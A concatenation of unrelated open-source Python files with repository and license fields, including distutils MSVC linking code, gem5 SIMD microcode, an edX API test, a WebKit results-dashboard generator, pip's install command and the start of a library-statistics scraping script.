+ str (runtime_library_dirs))
lib_opts = gen_lib_options(self,
library_dirs, runtime_library_dirs,
libraries)
if output_dir is not None:
output_filename = os.path.join(output_dir, output_filename)
if self._need_link(objects, output_filename):
if target_desc == CCompiler.EXECUTABLE:
if debug:
ldflags = self.ldflags_shared_debug[1:]
else:
ldflags = self.ldflags_shared[1:]
else:
if debug:
ldflags = self.ldflags_shared_debug
else:
ldflags = self.ldflags_shared
export_opts = []
for sym in (export_symbols or []):
export_opts.append("/EXPORT:" + sym)
ld_args = (ldflags + lib_opts + export_opts +
objects + ['/OUT:' + output_filename])
# The MSVC linker generates .lib and .exp files, which cannot be
# suppressed by any linker switches. The .lib files may even be
# needed! Make sure they are generated in the temporary build
# directory. Since they have different names for debug and release
# builds, they can go into the same directory.
build_temp = os.path.dirname(objects[0])
if export_symbols is not None:
(dll_name, dll_ext) = os.path.splitext(
os.path.basename(output_filename))
implib_file = os.path.join(
build_temp,
self.library_filename(dll_name))
ld_args.append ('/IMPLIB:' + implib_file)
self.manifest_setup_ldargs(output_filename, build_temp, ld_args)
if extra_preargs:
ld_args[:0] = extra_preargs
if extra_postargs:
ld_args.extend(extra_postargs)
self.mkpath(os.path.dirname(output_filename))
try:
self.spawn([self.linker] + ld_args)
except DistutilsExecError, msg:
raise LinkError(msg)
# embed the manifest
# XXX - this is somewhat fragile - if mt.exe fails, distutils
# will still consider the DLL up-to-date, but it will not have a
# manifest. Maybe we should link to a temp file? OTOH, that
# implies a build environment error that shouldn't go undetected.
mfinfo = self.manifest_get_embed_info(target_desc, ld_args)
if mfinfo is not None:
mffilename, mfid = mfinfo
out_arg = '-outputresource:%s;%s' % (output_filename, mfid)
try:
self.spawn(['mt.exe', '-nologo', '-manifest',
mffilename, out_arg])
except DistutilsExecError, msg:
raise LinkError(msg)
else:
log.debug("skipping %s (up-to-date)", output_filename)
def manifest_setup_ldargs(self, output_filename, build_temp, ld_args):
# If we need a manifest at all, an embedded manifest is recommended.
# See MSDN article titled
# "How to: Embed a Manifest Inside a C/C++ Application"
# (currently at http://msdn2.microsoft.com/en-us/library/ms235591(VS.80).aspx)
# Ask the linker to generate the manifest in the temp dir, so
# we can check it, and possibly embed it, later.
temp_manifest = os.path.join(
build_temp,
os.path.basename(output_filename) + ".manifest")
ld_args.append('/MANIFESTFILE:' + temp_manifest)
def manifest_get_embed_info(self, target_desc, ld_args):
# If a manifest should be embedded, return a tuple of
# (manifest_filename, resource_id). Returns None if no manifest
# should be embedded. See http://bugs.python.org/issue7833 for why
# we want to avoid any manifest for extension modules if we can.
for arg in ld_args:
if arg.startswith("/MANIFESTFILE:"):
temp_manifest = arg.split(":", 1)[1]
break
else:
# no /MANIFESTFILE so nothing to do.
return None
if target_desc == CCompiler.EXECUTABLE:
# by default, executables always get the manifest with the
# CRT referenced.
mfid = 1
else:
# Extension modules try and avoid any manifest if possible.
mfid = 2
temp_manifest = self._remove_visual_c_ref(temp_manifest)
if temp_manifest is None:
return None
return temp_manifest, mfid
def _remove_visual_c_ref(self, manifest_file):
try:
# Remove references to the Visual C runtime, so they will
# fall through to the Visual C dependency of Python.exe.
# This way, when installed for a restricted user (e.g.
# runtimes are not in WinSxS folder, but in Python's own
# folder), the runtimes do not need to be in every folder
# with .pyd's.
# Returns either the filename of the modified manifest or
# None if no manifest should be embedded.
manifest_f = open(manifest_file)
try:
manifest_buf = manifest_f.read()
finally:
manifest_f.close()
pattern = re.compile(
r"""<assemblyIdentity.*?name=("|')Microsoft\."""\
r"""VC\d{2}\.CRT("|').*?(/>|</assemblyIdentity>)""",
re.DOTALL)
manifest_buf = re.sub(pattern, "", manifest_buf)
pattern = "<dependentAssembly>\s*</dependentAssembly>"
manifest_buf = re.sub(pattern, "", manifest_buf)
# Now see if any other assemblies are referenced - if not, we
# don't want a manifest embedded.
pattern = re.compile(
r"""<assemblyIdentity.*?name=(?:"|')(.+?)(?:"|')"""
r""".*?(?:/>|</assemblyIdentity>)""", re.DOTALL)
if re.search(pattern, manifest_buf) is None:
return None
manifest_f = open(manifest_file, 'w')
try:
manifest_f.write(manifest_buf)
return manifest_file
finally:
manifest_f.close()
except IOError:
pass
# -- Miscellaneous methods -----------------------------------------
# These are all used by the 'gen_lib_options()' function, in
# ccompiler.py.
def library_dir_option(self, dir):
return "/LIBPATH:" + dir
def runtime_library_dir_option(self, dir):
raise DistutilsPlatformError(
"don't know how to set runtime library search path for MSVC++")
def library_option(self, lib):
return self.library_filename(lib)
def find_library_file(self, dirs, lib, debug=0):
# Prefer a debugging library if found (and requested), but deal
# with it if we don't have one.
if debug:
try_names = [lib + "_d", lib]
else:
try_names = [lib]
for dir in dirs:
for name in try_names:
libfile = os.path.join(dir, self.library_filename (name))
if os.path.exists(libfile):
return libfile
else:
# Oops, didn't find it in *any* of 'dirs'
return None
# Helper methods for using the MSVC registry settings
def find_exe(self, exe):
"""Return path to an MSVC executable program.
Tries to find the program in several places: first, one of the
MSVC program search paths from the registry; next, the directories
in the PATH environment variable. If any of those work, return an
absolute path that is known to exist. If none of them work, just
return the original program name, 'exe'.
"""
for p in self.__paths:
fn = os.path.join(os.path.abspath(p), exe)
if os.path.isfile(fn):
return fn
# didn't find it; try existing path
for p in os.environ['Path'].split(';'):
fn = os.path.join(os.path.abspath(p),exe)
if os.path.isfile(fn):
return fn
return exe
| gpl-2.0 |
SteveXiSong/ECE757-SnoopingPredictions | src/arch/x86/isa/insts/simd128/floating_point/data_reordering/unpack_and_interleave.py | 91 | 3794 | # Copyright (c) 2007 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
microcode = '''
def macroop UNPCKLPS_XMM_XMM {
unpack xmmh, xmml, xmmlm, ext=1, size=4
unpack xmml, xmml, xmmlm, ext=0, size=4
};
def macroop UNPCKLPS_XMM_M {
ldfp ufp1, seg, sib, disp, dataSize=8
unpack xmmh, xmml, ufp1, ext=1, size=4
unpack xmml, xmml, ufp1, ext=0, size=4
};
def macroop UNPCKLPS_XMM_P {
rdip t7
ldfp ufp1, seg, riprel, disp, dataSize=8
unpack xmmh, xmml, ufp1, ext=1, size=4
unpack xmml, xmml, ufp1, ext=0, size=4
};
def macroop UNPCKLPD_XMM_XMM {
movfp xmmh, xmmlm
};
def macroop UNPCKLPD_XMM_M {
ldfp xmmh, seg, sib, disp, dataSize=8
};
def macroop UNPCKLPD_XMM_P {
rdip t7
ldfp xmmh, seg, riprel, disp, dataSize=8
};
def macroop UNPCKHPS_XMM_XMM {
unpack xmml, xmmh, xmmhm, ext=0, size=4
unpack xmmh, xmmh, xmmhm, ext=1, size=4
};
def macroop UNPCKHPS_XMM_M {
lea t1, seg, sib, disp, dataSize=asz
ldfp ufp1, seg, [1, t0, t1], 8, dataSize=8
unpack xmml, xmmh, ufp1, ext=0, size=4
unpack xmmh, xmmh, ufp1, ext=1, size=4
};
def macroop UNPCKHPS_XMM_P {
rdip t7
lea t1, seg, riprel, disp, dataSize=asz
ldfp ufp1, seg, [1, t0, t1], 8, dataSize=8
unpack xmml, xmmh, ufp1, ext=0, size=4
unpack xmmh, xmmh, ufp1, ext=1, size=4
};
def macroop UNPCKHPD_XMM_XMM {
movfp xmml, xmmh
movfp xmmh, xmmhm
};
def macroop UNPCKHPD_XMM_M {
lea t1, seg, sib, disp, dataSize=asz
ldfp ufp1, seg, [1, t0, t1], 8, dataSize=8
movfp xmml, xmmh
movfp xmmh, ufp1
};
def macroop UNPCKHPD_XMM_P {
rdip t7
lea t1, seg, riprel, disp, dataSize=asz
ldfp ufp1, seg, [1, t0, t1], 8, dataSize=8
movfp xmml, xmmh
movfp xmmh, ufp1
};
'''
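# Illustrative effect of the unpack microops above (values are assumptions):
# with the destination's low half holding singles [a0, a1] and the source's
# low half holding [b0, b1] (low element first), UNPCKLPS yields the
# interleave a0, b0, a1, b1 -- the ext=0 unpack fills the new low half
# [a0, b0] and the ext=1 unpack fills the new high half [a1, b1].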
| bsd-3-clause |
cyanna/edx-platform | common/djangoapps/course_about/tests/test_api.py | 19 | 1861 | """
Tests the logical Python API layer of the Course About API.
"""
import ddt
import json
import unittest
from django.core.urlresolvers import reverse
from rest_framework.test import APITestCase
from rest_framework import status
from django.conf import settings
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory, CourseAboutFactory
from student.tests.factories import UserFactory
@ddt.ddt
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Test only valid in lms')
class CourseInfoTest(ModuleStoreTestCase, APITestCase):
"""
Test course information.
"""
USERNAME = "Bob"
EMAIL = "bob@example.com"
PASSWORD = "edx"
def setUp(self):
""" Create a course"""
super(CourseInfoTest, self).setUp()
self.course = CourseFactory.create()
self.user = UserFactory.create(username=self.USERNAME, email=self.EMAIL, password=self.PASSWORD)
self.client.login(username=self.USERNAME, password=self.PASSWORD)
def test_get_course_details_from_cache(self):
kwargs = dict()
kwargs["course_id"] = self.course.id
kwargs["course_runtime"] = self.course.runtime
kwargs["user_id"] = self.user.id
CourseAboutFactory.create(**kwargs)
resp = self.client.get(
reverse('courseabout', kwargs={"course_id": unicode(self.course.id)})
)
self.assertEqual(resp.status_code, status.HTTP_200_OK)
resp_data = json.loads(resp.content)
self.assertIsNotNone(resp_data)
resp = self.client.get(
reverse('courseabout', kwargs={"course_id": unicode(self.course.id)})
)
self.assertEqual(resp.status_code, status.HTTP_200_OK)
resp_data = json.loads(resp.content)
self.assertIsNotNone(resp_data)
| agpl-3.0 |
geminy/aidear | oss/qt/qt-everywhere-opensource-src-5.9.0/qtwebengine/src/3rdparty/chromium/third_party/WebKit/Tools/Scripts/webkitpy/layout_tests/generate_results_dashboard.py | 7 | 7696 | # Copyright (C) 2014 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import json
class ProcessJsonData(object):
def __init__(self, current_result_json_dict, old_failing_results_list, old_full_results_list):
self._current_result_json_dict = current_result_json_dict
self._old_failing_results_list = old_failing_results_list
self._old_full_results_list = old_full_results_list
self._final_result = []
def _get_test_result(self, test_result_data):
actual = test_result_data['actual']
expected = test_result_data['expected']
if actual == 'SKIP':
return actual
if actual == expected:
return 'HASSTDERR' if test_result_data.get('has_stderr') == 'true' else 'PASS'
else:
return actual
def _recurse_json_object(self, json_object, key_list):
for key in key_list:
try:
json_object = json_object[key]
except KeyError:
return 'NOTFOUND'
return self._get_test_result(json_object)
def _process_previous_json_results(self, key_list):
row = []
length = len(self._old_failing_results_list)
for index in range(0, length):
result = self._recurse_json_object(self._old_failing_results_list[index]["tests"], key_list)
if result == 'NOTFOUND':
result = self._recurse_json_object(self._old_full_results_list[index]["tests"], key_list)
row.append(result)
return row
def _add_archived_result(self, json_object, result):
json_object['archived_results'] = result
def _process_json_object(self, json_object, keyList):
for key, subdict in json_object.iteritems():
if isinstance(subdict, dict):
self._process_json_object(subdict, keyList + [key])
else:
row = [self._get_test_result(json_object)]
row += self._process_previous_json_results(keyList)
json_object.clear()
self._add_archived_result(json_object, row)
return
def generate_archived_result(self):
for key in self._current_result_json_dict["tests"]:
self._process_json_object(self._current_result_json_dict["tests"][key], [key])
return self._current_result_json_dict
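# Sketch of intended use (variable names are assumptions): given the parsed
# failing_results JSON of the newest run plus the lists of older runs,
#     merged = ProcessJsonData(current, old_failing, old_full) \
#                  .generate_archived_result()
# rewrites every leaf into an 'archived_results' row, newest result first.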
class DashBoardGenerator(object):
def __init__(self, port):
self._port = port
self._filesystem = port.host.filesystem
self._results_directory = self._port.results_directory()
self._results_directory_path = self._filesystem.dirname(self._results_directory)
self._current_result_json_dict = {}
self._old_failing_results_list = []
self._old_full_results_list = []
self._final_result = []
def _add_individual_result_links(self, results_directories):
archived_results_file_list = [(file + '/results.html') for file in results_directories]
archived_results_file_list.insert(0, 'results.html')
self._current_result_json_dict['result_links'] = archived_results_file_list
def _copy_dashboard_html(self):
dashboard_file = self._filesystem.join(self._results_directory, 'dashboard.html')
dashboard_html_file_path = self._filesystem.join(
self._port.layout_tests_dir(), 'fast/harness/archived-results-dashboard.html')
if not self._filesystem.exists(dashboard_file):
if self._filesystem.exists(dashboard_html_file_path):
self._filesystem.copyfile(dashboard_html_file_path, dashboard_file)
def _initialize(self):
file_list = self._filesystem.listdir(self._results_directory_path)
results_directories = []
for dir in file_list:
full_dir_path = self._filesystem.join(self._results_directory_path, dir)
if self._filesystem.isdir(full_dir_path):
if self._results_directory in full_dir_path:
results_directories.append(full_dir_path)
results_directories.sort(reverse=True, key=lambda x: self._filesystem.mtime(x))
current_failing_results_json_file = self._filesystem.join(results_directories[0], 'failing_results.json')
input_json_string = self._filesystem.read_text_file(current_failing_results_json_file)
input_json_string = input_json_string[12:-2] # Remove preceding string ADD_RESULTS( and ); at the end
self._current_result_json_dict['tests'] = json.loads(input_json_string)['tests']
results_directories = results_directories[1:]
# To add hyperlink to individual results.html
self._add_individual_result_links(results_directories)
# Load the remaining stale layout test results Json's to create the dashboard
for json_file in results_directories:
failing_json_file_path = self._filesystem.join(json_file, 'failing_results.json')
full_json_file_path = self._filesystem.join(json_file, 'full_results.json')
json_string = self._filesystem.read_text_file(failing_json_file_path)
json_string = json_string[12:-2] # Remove preceding string ADD_RESULTS( and ); at the end
self._old_failing_results_list.append(json.loads(json_string))
json_string_full_result = self._filesystem.read_text_file(full_json_file_path)
self._old_full_results_list.append(json.loads(json_string_full_result))
self._copy_dashboard_html()
def generate(self):
self._initialize()
# There must be at least one archived result to be processed
if self._current_result_json_dict:
process_json_data = ProcessJsonData(self._current_result_json_dict,
self._old_failing_results_list, self._old_full_results_list)
self._final_result = process_json_data.generate_archived_result()
final_json = json.dumps(self._final_result)
final_json = 'ADD_RESULTS(' + final_json + ');'
archived_results_file_path = self._filesystem.join(self._results_directory, 'archived_results.json')
self._filesystem.write_text_file(archived_results_file_path, final_json)
| gpl-3.0 |
yhoshino11/pytest_example | .tox/py27/lib/python2.7/site-packages/pip/commands/install.py | 31 | 16307 | from __future__ import absolute_import
import logging
import operator
import os
import tempfile
import shutil
import warnings
from pip.req import InstallRequirement, RequirementSet, parse_requirements
from pip.locations import build_prefix, virtualenv_no_global, distutils_scheme
from pip.basecommand import Command
from pip.index import PackageFinder
from pip.exceptions import (
InstallationError, CommandError, PreviousBuildDirError,
)
from pip import cmdoptions
from pip.utils.build import BuildDirectory
from pip.utils.deprecation import RemovedInPip7Warning, RemovedInPip8Warning
logger = logging.getLogger(__name__)
class InstallCommand(Command):
"""
Install packages from:
- PyPI (and other indexes) using requirement specifiers.
- VCS project urls.
- Local project directories.
- Local or remote source archives.
pip also supports installing from "requirements files", which provide
an easy way to specify a whole environment to be installed.
"""
name = 'install'
usage = """
%prog [options] <requirement specifier> [package-index-options] ...
%prog [options] -r <requirements file> [package-index-options] ...
%prog [options] [-e] <vcs project url> ...
%prog [options] [-e] <local project path> ...
%prog [options] <archive url/path> ..."""
summary = 'Install packages.'
def __init__(self, *args, **kw):
super(InstallCommand, self).__init__(*args, **kw)
cmd_opts = self.cmd_opts
cmd_opts.add_option(cmdoptions.editable.make())
cmd_opts.add_option(cmdoptions.requirements.make())
cmd_opts.add_option(cmdoptions.build_dir.make())
cmd_opts.add_option(
'-t', '--target',
dest='target_dir',
metavar='dir',
default=None,
help='Install packages into <dir>. '
'By default this will not replace existing files/folders in '
'<dir>. Use --upgrade to replace existing packages in <dir> '
'with new versions.'
)
cmd_opts.add_option(
'-d', '--download', '--download-dir', '--download-directory',
dest='download_dir',
metavar='dir',
default=None,
help=("Download packages into <dir> instead of installing them, "
"regardless of what's already installed."),
)
cmd_opts.add_option(cmdoptions.download_cache.make())
cmd_opts.add_option(cmdoptions.src.make())
cmd_opts.add_option(
'-U', '--upgrade',
dest='upgrade',
action='store_true',
help='Upgrade all specified packages to the newest available '
'version. This process is recursive regardless of whether '
'a dependency is already satisfied.'
)
cmd_opts.add_option(
'--force-reinstall',
dest='force_reinstall',
action='store_true',
help='When upgrading, reinstall all packages even if they are '
'already up-to-date.')
cmd_opts.add_option(
'-I', '--ignore-installed',
dest='ignore_installed',
action='store_true',
help='Ignore the installed packages (reinstalling instead).')
cmd_opts.add_option(cmdoptions.no_deps.make())
cmd_opts.add_option(
'--no-install',
dest='no_install',
action='store_true',
help="DEPRECATED. Download and unpack all packages, but don't "
"actually install them."
)
cmd_opts.add_option(
'--no-download',
dest='no_download',
action="store_true",
help="DEPRECATED. Don't download any packages, just install the "
"ones already downloaded (completes an install run with "
"--no-install).")
cmd_opts.add_option(cmdoptions.install_options.make())
cmd_opts.add_option(cmdoptions.global_options.make())
cmd_opts.add_option(
'--user',
dest='use_user_site',
action='store_true',
help="Install to the Python user install directory for your "
"platform. Typically ~/.local/, or %APPDATA%\Python on "
"Windows. (See the Python documentation for site.USER_BASE "
"for full details.)")
cmd_opts.add_option(
'--egg',
dest='as_egg',
action='store_true',
help="Install packages as eggs, not 'flat', like pip normally "
"does. This option is not about installing *from* eggs. "
"(WARNING: Because this option overrides pip's normal install"
" logic, requirements files may not behave as expected.)")
cmd_opts.add_option(
'--root',
dest='root_path',
metavar='dir',
default=None,
help="Install everything relative to this alternate root "
"directory.")
cmd_opts.add_option(
"--compile",
action="store_true",
dest="compile",
default=True,
help="Compile py files to pyc",
)
cmd_opts.add_option(
"--no-compile",
action="store_false",
dest="compile",
help="Do not compile py files to pyc",
)
cmd_opts.add_option(cmdoptions.use_wheel.make())
cmd_opts.add_option(cmdoptions.no_use_wheel.make())
cmd_opts.add_option(
'--pre',
action='store_true',
default=False,
help="Include pre-release and development versions. By default, "
"pip only finds stable versions.")
cmd_opts.add_option(cmdoptions.no_clean.make())
index_opts = cmdoptions.make_option_group(
cmdoptions.index_group,
self.parser,
)
self.parser.insert_option_group(0, index_opts)
self.parser.insert_option_group(0, cmd_opts)
def _build_package_finder(self, options, index_urls, session):
"""
Create a package finder appropriate to this install command.
This method is meant to be overridden by subclasses, not
called directly.
"""
return PackageFinder(
find_links=options.find_links,
index_urls=index_urls,
use_wheel=options.use_wheel,
allow_external=options.allow_external,
allow_unverified=options.allow_unverified,
allow_all_external=options.allow_all_external,
trusted_hosts=options.trusted_hosts,
allow_all_prereleases=options.pre,
process_dependency_links=options.process_dependency_links,
session=session,
)
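# A hypothetical subclass override, as the docstring above invites -- e.g.
# always allowing pre-releases (sketch only, not part of pip itself):
#     class PreInstallCommand(InstallCommand):
#         def _build_package_finder(self, options, index_urls, session):
#             options.pre = True
#             return super(PreInstallCommand, self)._build_package_finder(
#                 options, index_urls, session)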
def run(self, options, args):
if (
options.no_install or
options.no_download
):
warnings.warn(
"--no-install and --no-download are deprecated. "
"See https://github.com/pypa/pip/issues/906.",
RemovedInPip7Warning,
)
# If we have --no-install or --no-download and no --build we use the
# legacy static build dir
if (options.build_dir is None and
(options.no_install or options.no_download)):
options.build_dir = build_prefix
if options.download_dir:
options.no_install = True
options.ignore_installed = True
if options.build_dir:
options.build_dir = os.path.abspath(options.build_dir)
options.src_dir = os.path.abspath(options.src_dir)
install_options = options.install_options or []
if options.use_user_site:
if virtualenv_no_global():
raise InstallationError(
"Can not perform a '--user' install. User site-packages "
"are not visible in this virtualenv."
)
install_options.append('--user')
temp_target_dir = None
if options.target_dir:
options.ignore_installed = True
temp_target_dir = tempfile.mkdtemp()
options.target_dir = os.path.abspath(options.target_dir)
if (os.path.exists(options.target_dir) and not
os.path.isdir(options.target_dir)):
raise CommandError(
"Target path exists but is not a directory, will not "
"continue."
)
install_options.append('--home=' + temp_target_dir)
global_options = options.global_options or []
index_urls = [options.index_url] + options.extra_index_urls
if options.no_index:
logger.info('Ignoring indexes: %s', ','.join(index_urls))
index_urls = []
if options.use_mirrors:
warnings.warn(
"--use-mirrors has been deprecated and will be removed in the "
"future. Explicit uses of --index-url and/or --extra-index-url"
" is suggested.",
RemovedInPip7Warning,
)
if options.mirrors:
warnings.warn(
"--mirrors has been deprecated and will be removed in the "
"future. Explicit uses of --index-url and/or --extra-index-url"
" is suggested.",
RemovedInPip7Warning,
)
index_urls += options.mirrors
if options.download_cache:
warnings.warn(
"--download-cache has been deprecated and will be removed in "
"the future. Pip now automatically uses and configures its "
"cache.",
RemovedInPip8Warning,
)
with self._build_session(options) as session:
finder = self._build_package_finder(options, index_urls, session)
build_delete = (not (options.no_clean or options.build_dir))
with BuildDirectory(options.build_dir,
delete=build_delete) as build_dir:
requirement_set = RequirementSet(
build_dir=build_dir,
src_dir=options.src_dir,
download_dir=options.download_dir,
upgrade=options.upgrade,
as_egg=options.as_egg,
ignore_installed=options.ignore_installed,
ignore_dependencies=options.ignore_dependencies,
force_reinstall=options.force_reinstall,
use_user_site=options.use_user_site,
target_dir=temp_target_dir,
session=session,
pycompile=options.compile,
isolated=options.isolated_mode,
)
for name in args:
requirement_set.add_requirement(
InstallRequirement.from_line(
name, None, isolated=options.isolated_mode,
)
)
for name in options.editables:
requirement_set.add_requirement(
InstallRequirement.from_editable(
name,
default_vcs=options.default_vcs,
isolated=options.isolated_mode,
)
)
for filename in options.requirements:
for req in parse_requirements(
filename,
finder=finder, options=options, session=session):
requirement_set.add_requirement(req)
if not requirement_set.has_requirements:
opts = {'name': self.name}
if options.find_links:
msg = ('You must give at least one requirement to '
'%(name)s (maybe you meant "pip %(name)s '
'%(links)s"?)' %
dict(opts, links=' '.join(options.find_links)))
else:
msg = ('You must give at least one requirement '
'to %(name)s (see "pip help %(name)s")' % opts)
logger.warning(msg)
return
try:
if not options.no_download:
requirement_set.prepare_files(finder)
else:
# This is the only call site of locate_files. Nuke with
# fire.
requirement_set.locate_files()
if not options.no_install:
requirement_set.install(
install_options,
global_options,
root=options.root_path,
)
reqs = sorted(
requirement_set.successfully_installed,
key=operator.attrgetter('name'))
items = []
for req in reqs:
item = req.name
try:
if hasattr(req, 'installed_version'):
if req.installed_version:
item += '-' + req.installed_version
except Exception:
pass
items.append(item)
installed = ' '.join(items)
if installed:
logger.info('Successfully installed %s', installed)
else:
downloaded = ' '.join([
req.name
for req in requirement_set.successfully_downloaded
])
if downloaded:
logger.info(
'Successfully downloaded %s', downloaded
)
except PreviousBuildDirError:
options.no_clean = True
raise
finally:
# Clean up
if ((not options.no_clean) and
((not options.no_install) or
options.download_dir)):
requirement_set.cleanup_files()
if options.target_dir:
if not os.path.exists(options.target_dir):
os.makedirs(options.target_dir)
lib_dir = distutils_scheme('', home=temp_target_dir)['purelib']
for item in os.listdir(lib_dir):
target_item_dir = os.path.join(options.target_dir, item)
if os.path.exists(target_item_dir):
if not options.upgrade:
logger.warning(
'Target directory %s already exists. Specify '
'--upgrade to force replacement.',
target_item_dir
)
continue
if os.path.islink(target_item_dir):
logger.warning(
'Target directory %s already exists and is '
'a link. Pip will not automatically replace '
'links, please remove if replacement is '
'desired.',
target_item_dir
)
continue
if os.path.isdir(target_item_dir):
shutil.rmtree(target_item_dir)
else:
os.remove(target_item_dir)
shutil.move(
os.path.join(lib_dir, item),
target_item_dir
)
shutil.rmtree(temp_target_dir)
return requirement_set
| mit |
glaserti/LibraryTwitter | Python/1 - CSV from HTMLsource.py | 1 | 7213 | #
# Scraping website for information about libraries
#
# For getting information about the libraries, the database of the German Library Statistics (Deutsche Bibliotheksstatistik/DBS) which is hosted by the HBZ was used:
#
# http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/bibs.php
#
# For this project, 4 different requests were made:
#
# 1. DBS National Libraries ( == > 3 active<sup>(1)</sup> libraries)
# 1. DBS Section 4: University Libraries (i.e. not the entire Section 4 was queried) ( == > 83 active<sup>(2)</sup> libraries)
# 1. DBS Section 1: Public Libraries with population > 400,000 ( == > 18 libraries)<sup>(3)</sup>
# 1. DBS Section 2: Public Libraries with population > 100,000 ( == > 81 libraries)<sup>(4)</sup>
#
# Since the website doesn't give unique URLs for individual requests,
# you could download the source code of each database request and save them as HTML files.
#
# However, you could use the _printing page_ of the database result list, which returns
# an individual URL. This procedure is followed here, with the URLs given in the list of tuples "urlList".
#
# The result will be saved as a csv file for each database request to the cwd (i.e. current working directory).<sup>(5)</sup>
# Furthermore, those libraries without a valid url will be printed out (in a JSON prettyprint style).
#
# ---
#
# <sup>(1)</sup> In DBS National Libraries, there are actually four libraries listed, but one is inactive.
#
# <sup>(2)</sup> In DBS Section 4: University Libraries, there are actually 84 libraries listed, but one is inactive.
#
# <sup>(3)</sup> Two libraries were added manually to this goup of libraries: The Hamburger Bücherhallen, whose entry in DBS omitted the DBV Section, and the Zentral- und Landesbibliothek Berlin, which was listed as member of Section 4 "Wissenschaftliche Universalbibliotheken", though the library is member of Section 1 (and only guest member of Section 4 according to the DBV webpage (http://www.bibliotheksverband.de/mitglieder/).
#
# <sup>(4)</sup> From DBS Section 2, two libraries (KA119 and KA129) were removed: These are small "ehrenamtlich geführte" libraries (less than 1,000 books) without any presence on the internet.
# For two more libraries (MB026 and GY440) the urls, missing in the DBS, were added manually.
#
# <sup>(5)</sup> To find out what your cwd is, type:
#
# >```import os
# >print os.getcwd()```
#
# ---
#
# Data was collected: 2014-02-08
#
# List of URLs
#
# List of tuples of name & url
# urlList[0] = Nr. 1 (DBS National Libraries)
# urlList[1] = Nr. 2 (DBS Section 4, University Libraries)
# urlList[2] = Nr. 3 (DBS Section 1)
# urlList[3] = Nr. 4 (DBS Section 2)
urlList = [('DBS_NatBib', 'http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/adrbrowser.php?prt=AG012|AG292|AG000|AK001'),
('DBS_4_UB', 'http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/adrbrowser.php?prt=EM482|AH715|EJ882|EX035|AA708|AG188|DB900|DE081|AD011|DB079|AF093|AH090|AA289|MM201|AF007|EL283|AJ082|AB294|AD291|AE088|AX001|AA046|AC018|AB105|AA083|EL131|AE830|AL091|AE027|BK213|AX566|AL352|AK517|EX461|AL005|AL017|AG061|AC006|AE003|AB038|AK384|AD473|AH703|AB361|AD084|AK104|AF020|AA290|DE100|SB005|AL029|AK025|AB026|AA009|AH089|AH016|AN087|AJ100|EL039|AC030|AE386|AA034|AJ008|BD987|AE015|BD296|AH077|AE180|AH004|AF019|AK700|AH466|AH739|AJ355|AH028|AL467|AB385|AJ021|BZ398|AC468|DC072|DA385|BE926|FH880'),
('DBS_1', 'http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/adrbrowser.php?prt=AJ197|GE486|AA381|AE131|AH478|AJ136|AE064|AK062|AG115|AB075|AJ380|AL480|AH132|AA277|AE362|AE106'),
